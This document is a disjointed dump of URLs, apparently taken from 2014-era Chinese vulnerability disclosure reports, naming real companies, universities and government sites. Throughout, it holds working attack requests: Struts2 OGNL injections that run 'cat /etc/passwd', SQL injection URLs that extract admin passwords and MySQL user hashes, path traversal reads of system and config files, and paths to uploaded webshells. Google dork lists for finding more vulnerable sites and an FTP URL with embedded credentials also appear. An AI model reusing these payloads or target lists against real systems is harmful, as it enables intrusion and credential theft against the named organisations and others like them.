http://admin.zndns.com/userAction!login.do?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 https://github.com/qdayy/safeangel/blob/90de3a1f680bd0a018b2d1ba1cadbd7dde64c91e/api/send.php https://exmail.juhe.cn/ http://2014.juhe.cn:80/.git/config 
https://github.com/qdayy/2014.juhe http://dev.juhe.cn:80/.git/ https://github.com/kost/dvcs-ripper/tree/4e105c0217dbecdbcedc46eaa6861c31efc6ac3b http://2014.juhe.cn:80/.git/ http://2014.juhe.cn:80/.git/ http://shop.ehuatai.com/ inurl:/PublicFolder http://wsbgt.xaufe.edu.cn/PublicFolder/VideoList.aspx?level=4&TagID=10010808&type=catalog&userid=2 http://202.117.122.49/PublicFolder/VideoList.aspx?level=4&TagID=10010808&type=catalog&userid=2 http://122.206.110.3/adksvod/PublicFolder/VideoList.aspx?level=4&TagID=10010808&type=catalog&userid=2 http://mooc.dlteacher.com/ADKSVOD/PublicFolder/VideoList.aspx?level=4&TagID=10010808&type=catalog&userid=2 http://202.203.132.137/wsbgt/PublicFolder//VideoList.aspx?level=4&TagID=10010808&type=catalog&userid=2 www.henanjr.gov.cn http://125.46.11.50:9080/ http://117.139.75.25:8088/ http://tour.nihao8.net http://www.tanglv.com/LstInfo.asp?TT=2&SS=8&Id=48 http://www.yzgo588.com/LstInfo.asp?TT=2&SS=9&Id=47 http://www.jnhts.com/LstInfo.asp?TT=4&SS=118&Id=434 http://xmfits.com/LstInfo.asp?TT=2&SS=8&Id=12 http://hmlyly.com/LstInfo.asp?TT=22&SS=107&Id=350 http://www.xsbnyou.com/LstInfo.asp?TT=6&SS=110&Id=314 http://www.tongyoulm.com/LstInfo.asp?TT=2&SS=8&Id=734 http://pythn.net/LstInfo.asp?TT=2&SS=8&Id=48 http://jll0796.com/LstInfo.asp?TT=2&SS=9&Id=306 http://www.51yyw.com/LstInfo.asp?TT=2&SS=8&Id=589 http://tour.lygbst.cn/LstInfo.asp?TT=2&SS=9&Id=280 http://www.0537jg.com/LstInfo.asp?TT=7&SS=45&Id=242 http://www.langshanlvyou.com/LstInfo.asp?TT=2&SS=8&Id=47 http://tour.nihao8.net/LstInfo.asp?TT=2&SS=8&Id=48 http://www.bjadks.com/index.html inurl:/PublicFolder/VideoList.aspx?TagID= http://tour.nihao8.net http://tour.nihao8.net/Lstalone.asp?TT=14&SS=56 http://www.tongyoulm.com/Lstalone.asp?TT=3&SS=17 http://www.xsbnyou.com/Lstalone.asp?TT=3&SS=13 http://www.shambhalatrip.com/Lstalone.asp?TT=3&SS=12 http://www.0537jg.com/Lstalone.asp?TT=14&SS=54 http://www.langshanlvyou.com/Lstalone.asp?TT=3&SS=14 
http://www.yzgo588.com/Lstalone.asp?TT=14&SS=57 http://www.51yyw.com/Lstalone.asp?TT=14&SS=54 http://pythn.net/Lstalone.asp?TT=14&SS=55 http://xmfits.com/Lstalone.asp?TT=3&SS=12 http://xm8383.com/Lstalone.asp?TT=4&SS=20 http://hmlyly.com/Lstalone.asp?TT=1&ss=1 http://www.jnhts.com/Lstalone.asp?TT=1&SS=1 http://tour.lygbst.cn/Lstalone.asp?TT=3&SS=14 http://www.cmseasy.org/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%28username,0x3a,password%29%20from%20cdb_members%20limit%201%29%20%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 http://tour.nihao8.net http://tour.nihao8.net/LstPrintInfo.asp?TT=2&SS=8&Id=48 http://hmlyly.com/LstPrintInfo.asp?TT=9&SS=161&Id=376 http://tour.lygbst.cn/LstPrintInfo.asp?TT=2&SS=9&Id=279 http://www.xsbnyou.com/LstPrintInfo.asp?TT=7&SS=121&Id=281 http://jll0796.com/LstPrintInfo.asp?TT=3&SS=100&Id=362 http://www.51yyw.com/LstPrintInfo.asp?TT=2&SS=8&Id=589 http://www.dzguolv.com/LstPrintInfo.asp?TT=3&SS=19&Id=984 http://182.254.145.235/mobile.php?act=entry&eid=4645&weid=1# http://m.jumei.com/i/MobileWap/pay/?batch_trade_number=s*******&gateway_name=&gateway=AlipayMobileWap&address_id=48218711&logistic_preference=&prefer_delivery_day= http://beta.moirai.immomo.com:5050 http://210.14.147.130/ http://shuju.menet.com.cn http://www.itceo.com/www/edata_article/edata_article_list.php?edata_type_id=2 http://shixi.189.cn http://×××××××××××shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1%20union%20select%20user,host,3,password%20from%20mysql.user http://shixi.189.cn/shixibao/cp.php?ac=zhiwei_result_detail&ignore=1&jobid=8608%27 http://trust.pingan.com/downLoad.shtml?fileurl=../../../../../../../../etc/sysconfig/network&filename=network 
http://trust.pingan.com/downLoad.shtml?fileurl=../../../../../../../../etc/group&filename=group http://trust.pingan.com/downLoad.shtml?fileurl=../../../../../../../../etc/passwd&filename=passwd http://trust.pingan.com/downLoad.shtml?fileurl=../../../../../../../..//var/log/wtmp&filename=wtmp http://112.25.17.13/jsbims/login.action http://passport.jumei.com/Reset/setPass http://www.haitiansoft.com:8080/ http://erp.nepbaby.com:8080/oltp/account/login.aspx http://home.cofco.com/ www.haoshiku.com www.cofco.com www1.cofco.com http://idc.feng511.com http://wh.ip66.com/index.php网站下有个在线开通宽带的页面,即:http://wh.ip66.com/xinkai/ http://www.cnecora.com/class.aspx?id=17 http://www.ilovelohas.com.cn/upload/news/***00O.php http://www.htsec.com.hk/english/include/downloadFile.aspx页面对Name参数没有任何过滤导致任意文件下载漏洞 http://www.htsec.com.hk/english/include/downloadFile.aspx?Name=download/../../web.config http://www.mecare.cn/friend/find https://filippo.io/Heartbleed/#club.ehuatai.com https://filippo.io/Heartbleed/#219.141.242.47 http://211.147.17.137/ http://211.147.18.94/flex/index.html http://mail.tj.ct10000.com/webmail/client/cache/9/14119813809.jpg/2.php拿下的一句话 http://tmp.admin.51offer.com http://iufo.cofco.com/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction http://iufo.cofco.com/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://www.goldlib.com.cn/ http://www.goldlib.com.cn/list.asp?classid=22 http://xxxx/HotBroow.aspx?Call=TH http://www.51offer.com/apply/upload.html页面上传后可以删除,抓包: http://lisms.mof.gov.cn/lisms/action/AddUserAction.do http://wooyun.org/bugs/wooyun-2014-083204/trace/8695520e3d8e4b928723b0ff49d09834) http://loudong.360.cn/vul/info/id/13768) http://www.56888.net/Video/VideoDetails.aspx?id=2 http://www.56888.net/Video/VideoDetails.aspx?id=2 
https://github.com/xiaobailc/yapi_jms/blob/5c6a1482a91a6e35482e2ac27c5e07414ef243a5/activemq_receive.php http://exmail.qq.com/cgi-bin/loginpage?t=logindomain&f=biz¶m=liu.chang@icntv.tv http://gmis.nau.edu.cn/ http://gmis.nau.edu.cn/zsgl/login.aspx(以下截图均为此处) http://gmis.nau.edu.cn/zsgl/Fsgl/login.aspx http://baodian.women.sohu.com/Comment/ajax_add_comment http://www.itenable.com.cn/control/WebAPI/Search.news.inc.php http://icbc.mobilelottery.cn/ http://bbs.eos.changyou.com/uc_server/admin.php http://bbs.game.changyou.com/uc_server/admin.php http://bbs.ffo.changyou.com/uc_server/admin.php http://www.sxsjttzjz.gov.cn/program/htmledit/ewebeditor.asp?id=content1&style=standard_light2 http://121.31.56.50/userLogin.action http://61.50.254.40/thqm/searchCy.action http://www.haitiansoft.com:8080/ http://180.166.7.94/ZhuanTi/FolderDetails.asp?OAID=25 http://oa.tjfsu.edu.cn/ZhuanTi/FolderDetails.asp?OAID=25 http://www.fzsyxx.com/oa/ZhuanTi/FolderDetails.asp?OAID=25 http://vos.tjufe.edu.cn/ZhuanTi/FolderDetails.asp?OAID=25 http://www.shhjwl.com/vos/ZhuanTi/FolderDetails.asp?OAID=25 http://hi.bnet.cn/mLoginAction.do http://nc.womaiapp.com/ http://nc.womaiapp.com/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction http://nc.womaiapp.com/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false¶m_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute file:///C:/xxxxxx,你会发现出现以下报错,F12控制台内 data:text/html,biduwebdata data:text/html,biduwebdata data:text/html,biduwebdata lighting.tcl.com/en/products-d.aspx?ID=-1+OR+17-7%3d10&SortID=101 http://lighting.tcl.com/en/about.aspx?id=-1+OR+17-7%3d10 http://lighting.tcl.com/en/service-center.aspx?id=-1+OR+17-7%3d10 http://lighting.tcl.com/cn/wl.asp?SortID=%2527 http://golf.cctv.com/e/ViewImg/index.html http://golf.cctv.com/e/ViewImg/index.html?url=javascript:alert%28/BMa/%29 http://www.ahtcnsh.com/index.html 
http://www.ahtcnsh.com/test78.php,本次测试没有造成任何破坏!为了了解博彩网站的机理,我下载了部分博彩网站源码,下面是我识别出来的博彩网站,你们可以删除掉的 http://abc.123/CsWX0p http://60.190.27.46/ https://112.91.176.90/ http://117.21.209.103:8080/account_login.xhtml http://help.wayos.cn//detail.php?hp_id=51%20and%201=2%20union%20select%201,concat%28user%28%29,0x20,database%28%29,0x20,version%28%29%29,3,4,5,6,7,8,9,10,11 http://61.144.54.46/ http://jinan.anjuke.com/community/view/656151 http://jwc.just.edu.cn/down/aspxspy1.aspx http://jwc.just.edu.cn/down/big.aspx http://jwc.just.edu.cn/down/com2.3.asp http://lmppda.liby.com.cn/masp/ http://58.63.253.42/portal/WEB-INF/web.xml http://58.63.253.42/portal/WEB-INF/config/pluto/pluto-portal-driver-services-config.xml http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-basic.xml http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-datasource.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-frame.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-pub.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-perm.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-setting.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-page.xml http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-personal.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-portlet.xml http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-weibo.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-report.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-sms.xml http://58.63.253.42/portal/WEB-INF/sso/applicationContext-ssoClient.xml http://58.63.253.42/eassso//WEB-INF/web.xml http://58.63.253.42/eassso//WEB-INF/applicationContext.xml http://58.63.253.42/easssoWEB-INF/deployerConfigContext.xml 
https://m.suning.com/mts-web/auth?ticket=STF8A1826F2C3D7FF854C32DBFE1F4E4A6&targetUrl=http%3A%2F%2Fwww.baidu.com%2F%3F1410879819.99 http://gzjn.gzlm.net/showvote.php?vid=1 http://pan.baidu.com/s/1mgzabxe,提取码:wtjz,解压密码:qqpoc123,为了达到最佳观看效果,请解压所有文件到同一目录下,打开qqpoc.html文件。 inurl:/ggxxfb.action?lmid= http://pan.baidu.com/s/1mgl2RHI,提取码:9nx9,解压密码:rxpoc123,为了达到最佳观看效果,请解压所有文件到同一目录下,打开rxpoc.html文件。 http://www.yum.com.cn:80/ www.yum.com.cn http://bf.zjstv.com/theVoice/ http://pan.baidu.com/s/1gdH1jI7,提取码:7pys,解压密码:jspoc123,为了达到最佳观看效果,请解压所有文件到同一目录下,打开jspoc.html文件。 www.zhuansoo.com http://222.35.36.136:8080/login.action http://192.168.*.*/portalReceiveAction.do?wlanuserip=用户的IP&wlanacname=这个可以自定义 http://192.168.*.*登录你的账号密码。 http://192.168.*.*/portalReceiveAction.do?wlanuserip=任意IP&wlanacname=目标IP所在网段的wlanacname,页面内会有wlanacip字段,相应修改wlanacname和wlanacip便可相应地伪造下线请求。 www.56888.net/Video/VideoDetails.aspx?id=1(重复) http://www.56888.net/Video/VideoDetails.aspx?id=1 http://www.56888.net/search/goodslist/?keywords=zz http://wb.56888.net/TenderListProject.aspx?&tendertype=2&g=cg&s=fh&c=fg http://wb.56888.net/TenderList.aspx?&tendertype=0&g=s&s=s www.81886.cn http://www.81886.cn/contact.asp?id=36 http://www.81886.cn/cases.asp?areaid=243 http://www.81886.cn/news_show.asp?id=123 http://www.scbzkjgg.com/contact.asp?id=4 http://www.ylhwj.com/Contact.asp?Id=11 http://lsjgkj.com/Contact.asp?Id=11 http://www.hyteng.com/contact.asp?id=4 http://szyoudun.com/contact.asp?id=4 http://www.hadadv.com/Contact.asp?Id=11 http://www.xkhfm.com/Contact.asp?Id=11 http://www.szwmk.com/contact.asp?id=4 http://www.yatengmotor.com/contact.asp?id=36 http://www.aidazs.com/contact.asp?id=4 http://www.szhsdjx.com/contact.asp?id=4 http://szjdjx.com/contact.asp?id=4 http://www.jsfscps.com/contact.asp?id=4 http://www.zoboh.com/contact.asp?id=4 http://www.dhcdhj.com/Contact.asp?Id=11 http://www.szsts168.com/contact.asp?id=4 http://www.xh2000.com/contact.asp?id=4 http://www.szbtsg.com/Contact.asp?Id=11 
http://www.szysdnxh.com/Contact.asp?Id=11 http://szwbgs.com/contact.asp?id=4 http://holesh.com.cn/contact.asp?id=4 http://www.dgxxzsj.com/contact.asp?id=36 http://longxingfa888.com/contact.asp?id=4 http://www.holesh.com.cn/contact.asp?id=4 http://www.szwsdmj.com/contact.asp?id=36 http://www.yatengmotor.com/products.asp?areaid=237 http://www.szfwxpcb.com/products.asp?areaid=234 http://www.szpdxsp.com/products.asp?areaid=234 http://www.szsrmj.com/products.asp?areaid=243 http://www.flxchina.com.cn/products.asp?areaid=234 http://www.xianglong888.cn/products.asp?areaid=244 http://www.szhccnc.com/products.asp?areaid=247 http://www.xlyssz.com/products.asp?areaid=234 http://www.hongxinmold.com/products.asp?areaid=251 http://www.dgxxzsj.com/products.asp?areaid=273 http://www.hcxlyh.com/products.asp?areaid=245 http://www.szjh3d.com/products.asp?areaid=257 http://www.youzhutip.com/products.asp?areaid=255 http://www.szwsdmj.com/products.asp?areaid=250 http://www.yahuawujin.com/products.asp?areaid=262 http://www.yongkangtong.com/products.asp?areaid=255 http://chuangyaxin.net/products.asp?areaid=234 http://www.nengxingwujin.com/products.asp?areaid=285 http://sztfhs.com/products.asp?areaid=234 http://www.szysdnxh.com/NewsShow.asp?Id=27 http://www.szbtsg.com/NewsShow.asp?Id=63 http://www.szjh3d.com/news_show.asp?id=9 http://www.xlyssz.com/news_show.asp?id=9 http://www.flxchina.com.cn/news_show.asp?id=10 http://www.szwsdmj.com/news_show.asp?id=13 http://www.dgxxzsj.com/news_show.asp?id=370 http://www.yongkangtong.com/news_show.asp?id=13 http://www.szfwxpcb.com/news_show.asp?id=73 http://www.yatengmotor.com/news_show.asp?id=50 http://www.szpdxsp.com/news_show.asp?id=9 http://www.dhcdhj.com/NewsShow.asp?Id=69 http://www.szsrmj.com/news_show.asp?id=32 http://www.yahuawujin.com/news_show.asp?id=43 http://www.youzhutip.com/news_show.asp?id=99 http://www.hcxlyh.com/news_show.asp?id=9 http://www.xianglong888.cn/news_show.asp?id=9 http://www.szhccnc.com/news_show.asp?id=12 
http://www.hongxinmold.com/news_show.asp?id=11 www.shandongweb.com/ inurl:job.php IP:115.28.6.127 http://218.22.66.214:8088/search_wh.aspx http://wooyun.org/bugs/wooyun-2014-080062是完全不同的注入点 http://www.chinaiov.com/login.jsp http://123.127.222.196/ content://com.letv.ads.db.AdsContentProvider/ads_tablable content://com.letv.ads.db.AdsContentProvider/ads_table content://com.letv.ads.db.AdsContentProvider/ads_table http://58.42.236.252:8080/Login!input.action inurl:about.asp?ncid= inurl:www http://wooyun.org/bugs/wooyun-2014-077356这里提交了修复后,无聊看了一下,虽然前端显示部分为***。但返回的数据包里面隐藏了完整的email地址。导致再次遍历用户邮箱账号。 http://daxue.imooc.com/.svn/entries http://svn.imooc.com/svn/edu/trunk/webroot http://svn.imooc.com/svn/edu http://daxue.imooc.com/tms/ http://daxue.imooc.com/sms http://daxue.imooc.com/cms http://daxue.imooc.com/oms http://www.wuxianapp.com/index.action http://121.40.126.244/wooyun.php index.php/aboutcque/1* http://www.cque.edu.cn:80/ www.cque.edu.cn http://www.51tv.com/51tv/dtl.jsp?id=757573754 http://ghy.swufe.edu.cn/test/web.aspx http://ghy.swufe.edu.cn/test/admin_login.asp http://ghy.swufe.edu.cn/test/UploadFile/20141115194054571.asp http://www.ghy.cn/wooyun.txt http://wqhy.coco.cn/wap/detail.php?id=10374 inurl:Product.asp http://www.efeng.net.cn/admin http://www.jhun.edu.cn/WList.asp?Category=%D1%A7%CA%F5%BD%BB%C1%F7 http://121.29.241.16/login.aspx http://search.js.cei.gov.cn/006_jjnews/search/detail_daily.php?id=38382&tal=a http://search.js.cei.gov.cn/ http://search.js.cei.gov.cn/phpMyAdmin/ http://search.js.cei.gov.cn/002_jszh/dbconfig/dbconf.inc http://search.js.cei.gov.cn/subeifz/phpinfo.php X-FORWARDED-FOR:127.0.0.1 http://124.225.213.50/ http://124.225.65.241/dol/ http://124.225.65.241/dol/dol/mdforum.jsp?keepThis=true&forumcode=210 http://www.zgbus.net/ http://www.zgbus.net/news_fw.php?typeid=4为例 http://www.zgbus.net/news_fw.php?typeid=4 http://www.zgbus.net/news_fw.php?typeid=4%20union%20select%201,admin_user,3,4,5,6,7,8,9,10 
http://www.zgbus.net/news_fw.php?typeid=4%20union%20select%201,admin_pwd,3,4,5,6,7,8,9,10 http://www.zgbus.net/wooyun.txt http://www.hizyy.com/appointment.php?catid=88 http://www.hi-spider.com http://www.hi-spider.com/Index/support/id/877.html,伪静态 http://job.21wecan.com/rcjl/personal/resumeAction.do?us_id=1 http://xxxxxx/background/onlinemeetingstatus.php?ID=1 http://xxxxxx/background/sendsms.php?ID=1 http://xxxxxx/pub/bgtaskreq.php?svr=1 http://pan.baidu.com/s/1eQvO3hK,提取码:le6o,解压密码:kabapoc123,为了达到最佳观看效果,请解压所有文件到同一目录下,打开kabapoc.html文件。 http://www.atwasoft.com/p/views/customer.html hzsgjj.com/Website/newsshow.jsp?id=125 hzsgjj.com/Website/newsshow.jsp?id=125 http://www.xngjj.gov.cn/Website/newsshow.jsp?id=535 http://www.xngjj.gov.cn/Website/newsshow.jsp?id=535 http://mail.jxgzw.gov.cn/webmail/getPass1.php?email=jxsgzw@jxgzw.gov.cn&update=s http://mail.jxgzw.gov.cn/webmail/api/api.php?do=phpinfo inurl:about.aspx?mid= http://www.lyhnhotel.com/install/setup.aspx http://www.schlls.com/install/setup.aspx http://www.hscatv.com/install/setup.aspx http://www.gigi.com.cn/install/setup.aspx http://www.reachgroup.cn/install/setup.aspx http://www.oldmansion.cn/install/setup.aspx http://www.ztsd.cn/install/setup.aspx http://www.mxdl.com.cn/install/setup.aspx http://www.heleegroup.com/install/setup.aspx http://222.177.21.44:9082/oa inurl:/Magazine/NewMagazine.aspx http://www.jcadcg.com/Magazine/Default.aspx?year=2014&IssueID=1 http://www.jcadcg.com/Magazine/Defau http://sqlmap.org http://admin.zk-jxt.com http://www.jstu.sdnu.edu.cn/Magazine/NewMagazine.aspx?type=Viewnumber http://www.chinjpd.com/Magazine/NewMagazine.aspx?type=Viewnumber http://www.xdlchl.com/Magazine/NewMagazine.aspx?type=Viewnumber http://www.zhgysh.org/Magazine/NewMagazine.aspx?type=Viewnumber http://www.ywfxzz.cn/Magazine/NewMagazine.aspx?type=Viewnumber http://www.cjocp.com/Magazine/NewMagazine.aspx?type=ViewNumber http://zgrkkx.yywkt.cn/Magazine/NewMagazine.aspx?type=DownNumber 
http://210.73.83.157:7001/console/login/LoginForm.jsp http://210.73.83.157:7001/test/foot.jsp password:test inurl:news_show.asp?code= inurl:cp.asp?class= http://www.tayhhg.com/news_show.asp?code=wz0000000000060 http://www.ltfengtou.com/news_show.asp?code=wz0000000000076 http://www.tajxjx.com/news_show.asp?code=wz0000000000107 http://www.taishankuangj.com/news_show.asp?code=wz0000000000352 http://www.haojie163.com/news_show.asp?code=wz0000000000005 www.wxpangu.com inurl:products_s.asp?id= http://***.sina.com.cn/ http://***.sina.com.cn/uc_server/data/tmp/a_ok.php http://123.103.**.**/ http://123.103.**.**/static/space/t4/space.php http://**.video.sina.com.cn/ ie:ju***ie http://***.video.sina.com.cn/live5/index.php/login a1:lian***a1 http://202.108.*.**:8080/ http://202.106.**.**:8080/index.php http://202.108.**.**/ http://www.dy2018.com http://jxj.yn012.cn/student/login.jsp http://jxj.yn012.cn/student/appViewPublic.jsp?applyId=2398664&applyTypeId=1&publicType=school http://jxj.yn012.cn/student/appViewPublic.jsp?applyId=2111111&applyTypeId=1&publicType=school http://www.ce.zjut.edu.cn/Login!checkLogin.do http://202.102.41.235/mobileMS/ http://thedp.cn/thedp.rar http://thedp.cn/adthedp se://)的一些内容,都封装成了application/sogou-native-widget-plugin,因此,我们在这个协议下,要继续找到可用的XSS似乎比较困难。 se-extension://域下的XSS,由于搜狗浏览器内置的插件还比较多,挨个htm看一看,发现以下插件(截图插件)的页面存在XSS。 http://cms.nihao8.net/ http://cms.nihao8.net/LstPro.Asp?TT=2 http://www.zadoor.com/Lstpro.asp?TT=2 http://www.stxny.com/LstPro.Asp?TT=1 http://www.xbqkw.com/LstPro.asp?TT=2 http://www.hongsoftware.net/LstPro.asp?TT=5 http://www.scchigo.com/LstPro.Asp?TT=9 http://www.poshot.cn/LstPro.asp?TT=2 http://www.ccsiss.com/LstPro.asp?TT=1 http://121.14.62.19/OnDemand/loginAction.action 
http://121.14.62.19/OnDemand/loginAction.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.itsmv.com/ www.maticsoft.com http://shop.maticsoft.com/ http://shop1.maticsoft.cn/regionhandle.aspx inurl:Chanpin_L.asp?xx_chanpin_class_id= http://www.zhongshangwang.com/anli.asp http://www.jhsysb.cn/Chanpin_L.asp?xx_chanpin_class_id=75 http://www.lwtcwf.com/Chanpin_L.asp?xx_chanpin_class_id=90 http://www.ybcpfc.com:8000/creditarchives/consumer/KFCorpbasicinfo.aspx?kfcode=6 http://www.ysfgj.com.cn/creditarchives/consumer/KFCorpbasicinfo.aspx?kfcode=232 http://www.ybxfgj.cn/creditarchives/consumer/KFCorpbasicinfo.aspx?kfcode=82 http://www.fqsjsj.com/creditarchives/consumer/KFCorpbasicinfo.aspx?kfcode=3 http://www.ytfgs.com:8000/creditarchives/consumer/KFCorpbasicinfo.aspx?kfcode=21 http://www.trfcj.com:8000/creditarchives/consumer/KFCorpbasicinfo.aspx?kfcode=18 http://www.scglfc.com/creditarchives/consumer/KFCorpbasicinfo.aspx?kfcode=41 http://wq.csjys.com/creditarchives/consumer/KFCorpbasicinfo.aspx?kfcode=16 http://61.157.199.54:955/creditarchives/consumer/KFCorpbasicinfo.aspx?kfcode=1539 http://www.klkfqjsj.com:8000/creditarchives/consumer/KFCorpbasicinfo.aspx?kfcode=3 http://www.ybcpfc.com:8000/creditarchives/consumer/TousuRecord.aspx?kfcode=46 http://218.89.55.8/creditarchives/consumer/TousuRecord.aspx?kfcode=6 http://61.157.199.54:955/creditarchives/consumer/TousuRecord.aspx?page=-1&&kfcode=1576 http://221.236.245.126:8000/creditarchives/consumer/TousuRecord.aspx?page=-1&&kfcode=17 http://125.64.228.44:8000/creditarchives/consumer/TousuRecord.aspx?kfcode=4 
http://218.89.54.147/creditarchives/ShowPage.aspx?name=news&&id=9 http://221.10.67.197/creditarchives/ShowPage.aspx?name=news&&id=282 http://202.98.153.139/creditarchives/ShowPage.aspx?name=news&&id=1 http://www.scglfc.com/creditarchives/ShowPage.aspx?name=news&&id=41 http://218.89.138.170:955/creditarchives/ShowPage.aspx?name=news&&id=136 http://edit.buding.cn/cms/enter.php?product=../../../../../../../../../../etc/passwd%00.jpg http://edit.buding.cn/cms/enter.php?product=../../../../../../../../../..//home/yangyu/.bash_history%00.jpg ftp://e0734:e0734@www.e0734.com http://202.98.213.134/BsGuide.aspx?id=80&&title=1&n982250=v920964 http://125.66.128.229/BsGuide.aspx?id=80&&title=1&n982250=v920964 http://www.rhfcgl.com/BsGuide.aspx?id=80&&title=1&n982250=v920964 http://58.42.144.172/BsGuide.aspx?id=80&&title=1&n982250=v920964 http://www.ybxfgj.cn/BsGuide.aspx?id=80&&title=1&n982250=v920964 http://www.zylzfc.cn/BsGuide.aspx?id=80&&title=1&n982250=v920964 http://www.dyfgs.com/BsGuide.aspx?id=80&&title=1&n982250=v920964 http://www.ysfgj.com.cn/BsGuide.aspx?id=80&&title=1&n982250=v920964 http://222.86.207.241/BsGuide.aspx?id=80&&title=1&n982250=v920964 http://www.gdfgs.net/BsGuide.aspx?id=80&&title=1&n982250=v920964 http://game.cnhan.com/ http://wooyun.org/bugs/wooyun-2014-076556"得到后台 http://tiyu.nchu.edu.cn/ http://tiyu.nchu.edu.cn/download_ok.asp?id=12 http://www.chem.com.cn/BuyUser_show.aspx?id=848991 http://www.ggjgnh.cn/loginAction.action http://222.73.24.168:8080/s03/loginAction.action http://oa.derlook.com/loginAction!loginOut.do http://www.5u5u5u5u.com/home.action http://www.gdht.net.cn:8866/zy/ws/news_enter.action http://**.**.**/lms/portal/sp/login.php http://210.27.80.82/reader/redr_mail.php http://opac.lib.ustc.edu.cn/reader/get_pwd.php http://www.1000new.com http://183.136.221.199:28017 http://te.tuan.360.cn/checkapi_ajax.html?apiurl=http://soft.corp.qihoo.net http://218.80.212.210/index.asp 
https://passport.vip.com/login?src=http%3A%2F%2Fday.vip.com%2F26%2F%3Fpage%3D1 http://www.caep.org.cn/ReadNews.asp?NewsID=1183 http://www.cycb.com/conscribe.do?method=index&id=27 http://www.cycb.com/conscribe.do?method=index&id=27 http://lmp.liby.com.cn/lmpum/uuam/login/login.do?method=loginLiby http://tour.nihao8.net http://tour.nihao8.net/LstJobInfo.asp?TT=&SS=&Id=1 http://www.shambhalatrip.com/LstJobInfo.asp?TT=&SS=&Id=1 http://www.51yyw.com/LstJobInfo.asp?TT=&SS=&Id=1 http://www.jnhts.com/LstJobInfo.asp?TT=&SS=&Id=3 http://xmfits.com/LstJobInfo.asp?TT=&SS=&Id=1 http://www.tongyoulm.com/LstJobInfo.asp?TT=&SS=&Id=1 http://www.xsbnyou.com/LstJobInfo.asp?TT=&SS=&Id=1 http://www.langshanlvyou.com/LstJobInfo.asp?TT=&SS=&Id=1 http://www.tanglv.com/LstJobInfo.asp?TT=&SS=&Id=1 http://www.0776.cn/help/index.php?zid=8 http://hgsy.yangtzeu.edu.cn/ListArt.aspx?bid=3 inurl:/Docs/Commentlist.aspx?ItemID= http://ndxbskb.imu.edu.cn/docs/Lists.aspx?PinYin=qkdt http://shandixb.paperopen.com/docs/Lists.aspx?PinYin= http://ndxbskb.imu.edu.cn/docs/Lists.aspx?PinYin= http://www.zhsyeklczz.com//docs/Lists.aspx?PinYin= http://www.cqnuj.cn/docs/Lists.aspx?PinYin= http://ndxbskb.imu.edu.cn/docs/Lists.aspx?PinYin=qkdt http://www.sqlmap.org http://91fanhuan.com/www.tar.gz http://91fanhuan.com/pma inurl:ckPlay.aspx?movieID http://tz9158.com/4/ckPlay.aspx?movieID=e72dc544-50e7-4e45-b01c-63ffded http://www.sqlmap.org http://61.130.6.250/jpkc/snfzp-xy/admin/login.asp http://new.trip8080.com:8080/safe/findPwd3ForEmail.htm?emailUrl=vve0c%252FKTGB%252B%252FdYHkoHRwTaf%252FWZxdrHGqW5tODjVDBlpdB4hoQn2R7eB7veqD5KOB http://zatppaimai.com/new_1.asp?id=395 inurl:ckPlay2.aspx?movieID= http://www.tz9158.com/ckPlay2.aspx?movieID=2866b3e6-8460-410a-a526-52f3 http://www.sqlmap.org www.tz9158.com\session wsjws.gzga.gov.cn/leadshow.aspxlid=3061_ http://xzsp.gzjs.gov.cn/PersonApp/print/Structural/EmpNCAppPrint.aspx?fid=499e1008-d2a3- http://yxjs.sntcm.edu.cn/TeacherView.asp?id=16 
